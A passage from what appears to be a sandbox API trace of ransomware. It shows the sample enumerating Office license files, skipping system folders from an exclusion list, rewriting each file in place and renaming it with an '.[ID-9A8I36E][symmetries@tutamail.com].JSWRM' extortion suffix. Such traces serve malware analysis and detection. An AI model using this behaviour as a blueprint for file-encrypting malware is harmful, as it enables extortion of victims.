lstrcmpiW (lpString1="MondoR_SubTest-ppd.xrm-ms", lpString2="msocache") returned -1 [0104.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0104.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTest-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0104.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0104.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTest-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x240f98, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_SubTest-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0104.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0104.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0104.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTest-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0104.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0104.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTest-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x2413a8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_SubTest-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0104.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0104.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0104.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0104.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0104.163] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTest-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtest-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.163] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=26524) returned 1 [0104.163] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6790) returned 0x24c1d0 [0104.163] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x6790, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x6790, lpOverlapped=0x0) returned 1 [0104.168] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.168] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x6790, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x6790, lpOverlapped=0x0) returned 1 [0104.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.168] CloseHandle (hObject=0x45c) returned 1 [0104.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0104.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0104.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0104.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0104.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0104.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0104.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.169] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTest-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtest-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTest-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtest-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0104.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0104.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0104.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0104.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0104.170] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe501ae6b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe501ae6b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5125e2f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d47, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_SubTest-ul-oob.xrm-ms", cAlternateFileName="MODB58~1.XRM")) returned 1 [0104.170] lstrcmpiW (lpString1="MondoR_SubTest-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.170] lstrcmpiW (lpString1="MondoR_SubTest-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.170] lstrcmpiW (lpString1="MondoR_SubTest-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.170] lstrcmpiW (lpString1="MondoR_SubTest-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.170] lstrcmpiW (lpString1="MondoR_SubTest-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.170] lstrcmpiW (lpString1="MondoR_SubTest-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.170] lstrcmpiW (lpString1="MondoR_SubTest-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.170] lstrcmpiW (lpString1="MondoR_SubTest-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.170] lstrcmpiW (lpString1="MondoR_SubTest-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.170] lstrcmpiW (lpString1="MondoR_SubTest-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0104.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0104.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTest-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0104.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0104.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTest-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241268, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_SubTest-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0104.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0104.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0104.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTest-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0104.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0104.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTest-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x240fe8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_SubTest-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0104.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0104.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0104.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0104.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0104.171] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTest-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtest-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.171] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11591) returned 1 [0104.171] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0104.171] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0104.174] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.174] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0104.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.174] CloseHandle (hObject=0x45c) returned 1 [0104.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0104.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0104.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0104.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0104.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0104.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0104.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.175] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTest-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtest-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTest-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtest-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0104.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0104.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0104.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0104.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0104.176] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4f0fda9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4f0fda9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4ff4c1f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b8f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_SubTest2-pl.xrm-ms", cAlternateFileName="MO14DE~1.XRM")) returned 1 [0104.176] lstrcmpiW (lpString1="MondoR_SubTest2-pl.xrm-ms", lpString2=".") returned 1 [0104.176] lstrcmpiW (lpString1="MondoR_SubTest2-pl.xrm-ms", lpString2="..") returned 1 [0104.176] lstrcmpiW (lpString1="MondoR_SubTest2-pl.xrm-ms", lpString2="...") returned 1 [0104.176] lstrcmpiW (lpString1="MondoR_SubTest2-pl.xrm-ms", lpString2="windows") returned -1 [0104.176] lstrcmpiW (lpString1="MondoR_SubTest2-pl.xrm-ms", lpString2="recovery") returned -1 [0104.176] lstrcmpiW (lpString1="MondoR_SubTest2-pl.xrm-ms", lpString2="perflogs") returned -1 [0104.176] lstrcmpiW (lpString1="MondoR_SubTest2-pl.xrm-ms", lpString2="documents and settings") returned 1 [0104.176] lstrcmpiW (lpString1="MondoR_SubTest2-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.176] lstrcmpiW (lpString1="MondoR_SubTest2-pl.xrm-ms", lpString2="system volume information") returned -1 [0104.176] lstrcmpiW (lpString1="MondoR_SubTest2-pl.xrm-ms", lpString2="msocache") returned -1 [0104.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0104.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTest2-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0104.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0104.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTest2-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x240f20, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_SubTest2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0104.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0104.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0104.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTest2-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0104.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0104.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTest2-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241330, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_SubTest2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0104.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0104.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0104.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0104.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0104.177] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTest2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtest2-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.177] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11151) returned 1 [0104.177] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b80) returned 0x24c1d0 [0104.177] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2b80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2b80, lpOverlapped=0x0) returned 1 [0104.179] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.179] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2b80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2b80, lpOverlapped=0x0) returned 1 [0104.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.179] CloseHandle (hObject=0x45c) returned 1 [0104.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0104.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0104.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0104.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0104.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0104.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0104.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.180] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTest2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtest2-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTest2-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtest2-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0104.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0104.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0104.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0104.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0104.181] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4e2afa8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4e2afa8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4ee9b60, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x679d, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_SubTest2-ppd.xrm-ms", cAlternateFileName="MOE88F~1.XRM")) returned 1 [0104.181] lstrcmpiW (lpString1="MondoR_SubTest2-ppd.xrm-ms", lpString2=".") returned 1 [0104.181] lstrcmpiW (lpString1="MondoR_SubTest2-ppd.xrm-ms", lpString2="..") returned 1 [0104.181] lstrcmpiW (lpString1="MondoR_SubTest2-ppd.xrm-ms", lpString2="...") returned 1 [0104.181] lstrcmpiW 